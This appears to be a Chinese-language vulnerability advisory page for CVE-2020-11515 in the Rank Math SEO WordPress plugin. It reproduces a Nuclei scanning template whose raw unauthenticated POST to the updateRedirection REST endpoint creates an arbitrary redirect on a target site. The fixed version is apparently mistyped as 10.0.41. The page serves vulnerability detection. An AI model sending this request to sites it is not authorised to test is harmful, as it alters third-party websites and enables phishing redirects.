CVE-2020-11515: Rank Math SEO <= 1.0.40.2 - Redirect Creation via Unprotected REST API Endpoint

日期: 2025-08-01 | 影响软件: Rank Math SEO | POC: 已公开

漏洞描述

The Rank Math plugin through 1.0.40.2 for WordPress allows unauthenticated remote attackers to create new URIs (that redirect to an external web site) via the unsecured rankmath/v1/updateRedirection REST API endpoint. In other words, this is not an "Open Redirect" issue; instead, it allows the attacker to create a new URI with an arbitrary name (e.g., the /exampleredirect URI).

PoC代码[已公开]

id: CVE-2020-11515

info:
  name: Rank Math SEO <= 1.0.40.2 - Redirect Creation via Unprotected REST API Endpoint
  author: s4e-io
  severity: medium
  description: |
    The Rank Math plugin through 1.0.40.2 for WordPress allows unauthenticated remote attackers to create new URIs (that redirect to an external web site) via the unsecured rankmath/v1/updateRedirection REST API endpoint. In other words, this is not an "Open Redirect" issue; instead, it allows the attacker to create a new URI with an arbitrary name (e.g., the /exampleredirect URI).
  remediation: Fixed in 10.0.41.
  reference:
    - https://www.wordfence.com/blog/2020/03/critical-vulnerabilities-affecting-over-200000-sites-patched-in-rank-math-seo-plugin/
    - https://rankmath.com/changelog/
    - https://wordpress.org/plugins/seo-by-rank-math/#developers
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-11515
    cwe-id: CWE-601
    epss-score: 0.00857
    epss-percentile: 0.74202
    cpe: cpe:2.3:a:rankmath:seo:*:*:*:*:free:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: rankmath
    product: seo
    framework: wordpress
    publicwww-query: "/wp-content/plugins/seo-by-rank-math/"
  tags: cve,cve2020,wordpress,wordfence,redirect,seo-by-rank-math,wp-plugin,wp

http:
  - raw:
      - |
        POST /wp-json/rankmath/v1/updateRedirection HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "redirectionUrl": "http://{{to_lower(rand_text_alpha(20))}}.{{to_lower(rand_text_alpha(5))}}",
          "redirectionSources": "/{{to_lower(rand_text_alpha(10))}}",
          "hasRedirect": "true"
        }

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "update","Redirection updated successfully.")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100b6d82b5dcc4aebfd691e748bd2b9160778053c06560e5d05180b62ca441d17cd02207ba4dc4619f88aa6199903183f7c00a5aa7e0e9074a63a192a42279070cfb191:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2020/CVE-2020-11515.yaml

相关漏洞推荐